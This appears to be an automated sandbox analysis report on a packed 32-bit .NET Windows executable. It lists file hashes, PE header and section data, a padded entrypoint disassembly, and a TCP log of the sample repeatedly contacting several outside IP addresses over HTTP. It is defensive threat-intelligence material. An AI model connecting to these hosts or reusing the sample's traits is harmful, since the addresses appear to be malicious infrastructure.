SHA512:	091298472e187a34881b51e911e9a19087e3771066fc69e6b8c9a2294d7f70972d75e0d1d3be78490a478baaa1a912bbb5f93189121671d52956b08183b08c32
SSDEEP:	12288:usf006snGigV2wDFj4yXWTojpabXHUWNRQLXPjEjTstCcYxatUolb:usbDnGWwJjtGToUbX00RGfAk0PxrO
TLSH:	BDE4230E568EDF16C895CBF8704B795843FB8F7E4E97EAAA08A5116BCD331420768353
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....y.g..............0.................. ........@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4abc02
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6703798F [Mon Oct 7 06:02:55 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xabbb0	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xac000	0x5a4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xae000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xaa5b4	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa9c08	0xa9e00	d969a4454550b25073e6ff0461ee0ed9	False	0.9852689247608536	data	7.985642370115789	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xac000	0x5a4	0x600	8a8d8f4537c61eb9974e4333681e8f4c	False	0.419921875	data	4.067183632886338	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xae000	0xc	0x200	a306fc130c5d46cd4f5350e6d5cc6e5f	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xac090	0x314	data			0.434010152284264
RT_MANIFEST	0xac3b4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 11:51:09.006345034 CEST	49764	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:51:09.106699944 CEST	80	49764	3.33.130.190	192.168.11.30
Oct 7, 2024 11:51:09.106851101 CEST	49764	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:51:09.124337912 CEST	49764	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:51:09.224689960 CEST	80	49764	3.33.130.190	192.168.11.30
Oct 7, 2024 11:51:10.116149902 CEST	80	49764	3.33.130.190	192.168.11.30
Oct 7, 2024 11:51:10.116164923 CEST	80	49764	3.33.130.190	192.168.11.30
Oct 7, 2024 11:51:10.116421938 CEST	49764	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:51:10.119426012 CEST	49764	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:51:10.122750044 CEST	80	49764	3.33.130.190	192.168.11.30
Oct 7, 2024 11:51:10.122958899 CEST	49764	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:51:10.219300985 CEST	80	49764	3.33.130.190	192.168.11.30
Oct 7, 2024 11:51:25.425477982 CEST	49765	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:25.603648901 CEST	80	49765	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:25.603862047 CEST	49765	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:25.612481117 CEST	49765	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:25.790832043 CEST	80	49765	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:25.795563936 CEST	80	49765	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:25.795648098 CEST	80	49765	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:25.795751095 CEST	80	49765	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:25.795818090 CEST	49765	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:25.795883894 CEST	49765	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:27.125967979 CEST	49765	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:28.144068003 CEST	49766	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:28.322369099 CEST	80	49766	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:28.322618008 CEST	49766	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:28.330579996 CEST	49766	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:28.509152889 CEST	80	49766	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:28.514333010 CEST	80	49766	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:28.514384985 CEST	80	49766	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:28.514420033 CEST	80	49766	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:28.514566898 CEST	49766	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:28.514566898 CEST	49766	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:29.844105959 CEST	49766	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:30.861975908 CEST	49767	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:31.040663004 CEST	80	49767	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:31.040894032 CEST	49767	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:31.048403025 CEST	49767	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:31.226558924 CEST	80	49767	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:31.226650000 CEST	80	49767	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:31.226660967 CEST	80	49767	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:31.232054949 CEST	80	49767	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:31.232606888 CEST	80	49767	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:31.232624054 CEST	80	49767	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:31.232811928 CEST	49767	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:32.562441111 CEST	49767	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:33.580084085 CEST	49768	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:33.758224010 CEST	80	49768	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:33.758430958 CEST	49768	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:33.763830900 CEST	49768	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:33.942166090 CEST	80	49768	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:33.948555946 CEST	80	49768	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:33.948638916 CEST	80	49768	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:33.948714972 CEST	80	49768	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:33.948772907 CEST	80	49768	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:33.948849916 CEST	80	49768	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:33.948966026 CEST	49768	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:33.949017048 CEST	49768	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:33.949176073 CEST	49768	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:33.953507900 CEST	49768	80	192.168.11.30	217.160.0.27
Oct 7, 2024 11:51:34.156975985 CEST	80	49768	217.160.0.27	192.168.11.30
Oct 7, 2024 11:51:48.600068092 CEST	49769	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:48.921857119 CEST	80	49769	38.55.251.233	192.168.11.30
Oct 7, 2024 11:51:48.922102928 CEST	49769	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:48.931035995 CEST	49769	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:49.240359068 CEST	80	49769	38.55.251.233	192.168.11.30
Oct 7, 2024 11:51:49.240433931 CEST	80	49769	38.55.251.233	192.168.11.30
Oct 7, 2024 11:51:49.240489006 CEST	80	49769	38.55.251.233	192.168.11.30
Oct 7, 2024 11:51:49.240688086 CEST	49769	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:50.433305979 CEST	49769	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:51.451468945 CEST	49770	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:51.757498026 CEST	80	49770	38.55.251.233	192.168.11.30
Oct 7, 2024 11:51:51.757785082 CEST	49770	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:51.765125036 CEST	49770	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:52.069902897 CEST	80	49770	38.55.251.233	192.168.11.30
Oct 7, 2024 11:51:52.069983006 CEST	80	49770	38.55.251.233	192.168.11.30
Oct 7, 2024 11:51:52.070034027 CEST	80	49770	38.55.251.233	192.168.11.30
Oct 7, 2024 11:51:52.070240021 CEST	49770	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:53.276345968 CEST	49770	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:54.294131041 CEST	49771	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:54.600680113 CEST	80	49771	38.55.251.233	192.168.11.30
Oct 7, 2024 11:51:54.600888968 CEST	49771	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:54.608366966 CEST	49771	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:54.608388901 CEST	49771	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:54.912723064 CEST	80	49771	38.55.251.233	192.168.11.30
Oct 7, 2024 11:51:54.912739038 CEST	80	49771	38.55.251.233	192.168.11.30
Oct 7, 2024 11:51:54.912909031 CEST	80	49771	38.55.251.233	192.168.11.30
Oct 7, 2024 11:51:54.913897991 CEST	80	49771	38.55.251.233	192.168.11.30
Oct 7, 2024 11:51:54.914091110 CEST	49771	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:56.119406939 CEST	49771	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:57.137116909 CEST	49772	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:57.438832045 CEST	80	49772	38.55.251.233	192.168.11.30
Oct 7, 2024 11:51:57.439085007 CEST	49772	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:57.444819927 CEST	49772	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:57.745979071 CEST	80	49772	38.55.251.233	192.168.11.30
Oct 7, 2024 11:51:57.746470928 CEST	80	49772	38.55.251.233	192.168.11.30
Oct 7, 2024 11:51:57.746481895 CEST	80	49772	38.55.251.233	192.168.11.30
Oct 7, 2024 11:51:57.746788979 CEST	49772	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:57.748984098 CEST	49772	80	192.168.11.30	38.55.251.233
Oct 7, 2024 11:51:58.050009012 CEST	80	49772	38.55.251.233	192.168.11.30
Oct 7, 2024 11:52:02.880928993 CEST	49773	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:02.980918884 CEST	80	49773	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:02.981101036 CEST	49773	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:02.989840984 CEST	49773	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:03.090090990 CEST	80	49773	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:03.986027956 CEST	80	49773	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:03.986143112 CEST	49773	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:04.492455006 CEST	49773	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:04.592396021 CEST	80	49773	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:05.510930061 CEST	49774	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:05.610212088 CEST	80	49774	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:05.610347033 CEST	49774	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:05.622147083 CEST	49774	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:05.721385956 CEST	80	49774	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:05.722814083 CEST	80	49774	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:05.722963095 CEST	49774	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:07.132468939 CEST	49774	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:07.232264996 CEST	80	49774	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:08.151885033 CEST	49775	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:08.251121044 CEST	80	49775	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:08.251302004 CEST	49775	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:08.261852026 CEST	49775	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:08.261881113 CEST	49775	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:08.361152887 CEST	80	49775	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:08.361237049 CEST	80	49775	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:08.361248016 CEST	80	49775	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:09.290406942 CEST	80	49775	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:09.290553093 CEST	49775	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:09.772500038 CEST	49775	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:09.871767044 CEST	80	49775	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:10.791383982 CEST	49776	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:10.891016960 CEST	80	49776	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:10.891170979 CEST	49776	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:10.899749994 CEST	49776	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:11.000232935 CEST	80	49776	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:13.924356937 CEST	80	49776	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:13.924387932 CEST	80	49776	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:13.924613953 CEST	49776	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:13.927648067 CEST	49776	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:13.930120945 CEST	80	49776	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:13.930262089 CEST	49776	80	192.168.11.30	3.33.130.190
Oct 7, 2024 11:52:14.026730061 CEST	80	49776	3.33.130.190	192.168.11.30
Oct 7, 2024 11:52:19.683279037 CEST	49777	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:19.904680014 CEST	80	49777	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:19.904879093 CEST	49777	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:19.916301012 CEST	49777	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:20.139906883 CEST	80	49777	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:20.156311035 CEST	80	49777	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:20.156388998 CEST	80	49777	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:20.156402111 CEST	80	49777	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:20.156425953 CEST	80	49777	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:20.156728029 CEST	49777	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:21.426096916 CEST	49777	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:22.445966005 CEST	49778	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:22.676624060 CEST	80	49778	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:22.676770926 CEST	49778	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:22.691384077 CEST	49778	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:22.921835899 CEST	80	49778	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:22.922369957 CEST	80	49778	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:22.922487020 CEST	80	49778	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:22.922492981 CEST	49778	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:22.922576904 CEST	80	49778	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:22.922594070 CEST	80	49778	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:22.922722101 CEST	49778	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:22.922722101 CEST	49778	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:24.206707954 CEST	49778	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:25.225632906 CEST	49779	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:25.459810972 CEST	80	49779	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:25.460124969 CEST	49779	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:25.473218918 CEST	49779	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:25.473268986 CEST	49779	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:25.707657099 CEST	80	49779	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:25.707700968 CEST	80	49779	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:25.708239079 CEST	80	49779	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:25.708363056 CEST	80	49779	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:25.708374023 CEST	80	49779	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:25.708410025 CEST	80	49779	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:25.708569050 CEST	49779	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:25.708569050 CEST	49779	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:25.708569050 CEST	49779	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:25.708616972 CEST	49779	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:26.987440109 CEST	49779	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:28.006635904 CEST	49780	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:28.311491966 CEST	80	49780	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:28.311695099 CEST	49780	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:28.328273058 CEST	49780	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:28.633701086 CEST	80	49780	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:28.634067059 CEST	80	49780	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:28.634118080 CEST	80	49780	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:28.634215117 CEST	80	49780	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:28.634318113 CEST	80	49780	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:28.634340048 CEST	49780	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:28.634376049 CEST	80	49780	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:28.634390116 CEST	80	49780	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:28.634402037 CEST	80	49780	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:28.634413958 CEST	80	49780	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:28.634430885 CEST	80	49780	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:28.634521961 CEST	49780	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:28.634618044 CEST	49780	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:28.634715080 CEST	49780	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:28.638350964 CEST	49780	80	192.168.11.30	194.58.112.174
Oct 7, 2024 11:52:28.944648981 CEST	80	49780	194.58.112.174	192.168.11.30
Oct 7, 2024 11:52:33.936430931 CEST	49781	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:34.101864100 CEST	80	49781	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:34.102047920 CEST	49781	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:34.116538048 CEST	49781	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:34.281956911 CEST	80	49781	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:34.283698082 CEST	80	49781	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:34.283783913 CEST	80	49781	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:34.283938885 CEST	49781	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:35.625992060 CEST	49781	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:36.644834995 CEST	49782	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:36.823419094 CEST	80	49782	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:36.823595047 CEST	49782	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:36.847074032 CEST	49782	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:37.019573927 CEST	80	49782	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:37.020891905 CEST	80	49782	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:37.020901918 CEST	80	49782	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:37.021158934 CEST	49782	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:38.360071898 CEST	49782	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:39.378912926 CEST	49783	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:39.544478893 CEST	80	49783	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:39.544761896 CEST	49783	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:39.554495096 CEST	49783	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:39.554550886 CEST	49783	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:39.729624033 CEST	80	49783	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:39.729713917 CEST	80	49783	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:39.729723930 CEST	80	49783	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:39.731892109 CEST	80	49783	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:39.731920004 CEST	80	49783	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:39.732140064 CEST	49783	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:41.062299967 CEST	49783	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:42.081372976 CEST	49784	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:42.248852968 CEST	80	49784	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:42.249100924 CEST	49784	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:42.257700920 CEST	49784	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:42.423011065 CEST	80	49784	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:42.427572966 CEST	80	49784	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:42.427644014 CEST	80	49784	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:42.427654982 CEST	80	49784	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:42.427964926 CEST	49784	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:42.433404922 CEST	49784	80	192.168.11.30	217.70.184.50
Oct 7, 2024 11:52:42.598730087 CEST	80	49784	217.70.184.50	192.168.11.30
Oct 7, 2024 11:52:47.583410025 CEST	49785	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:47.677856922 CEST	80	49785	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:47.678077936 CEST	49785	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:47.689922094 CEST	49785	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:47.784399986 CEST	80	49785	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:47.791769028 CEST	80	49785	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:47.791790962 CEST	80	49785	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:47.791804075 CEST	80	49785	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:47.791935921 CEST	49785	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:47.798692942 CEST	80	49785	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:47.798772097 CEST	49785	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:49.201121092 CEST	49785	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:50.220016956 CEST	49786	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:50.314613104 CEST	80	49786	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:50.314862967 CEST	49786	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:50.325870037 CEST	49786	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:50.420279980 CEST	80	49786	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:50.427710056 CEST	80	49786	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:50.427748919 CEST	80	49786	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:50.427819014 CEST	80	49786	199.59.243.227	192.168.11.30
Oct 7, 2024 11:52:50.428008080 CEST	49786	80	192.168.11.30	199.59.243.227
Oct 7, 2024 11:52:50.428200006 CEST	49786	80	192.168.11.30	199.59.243.227
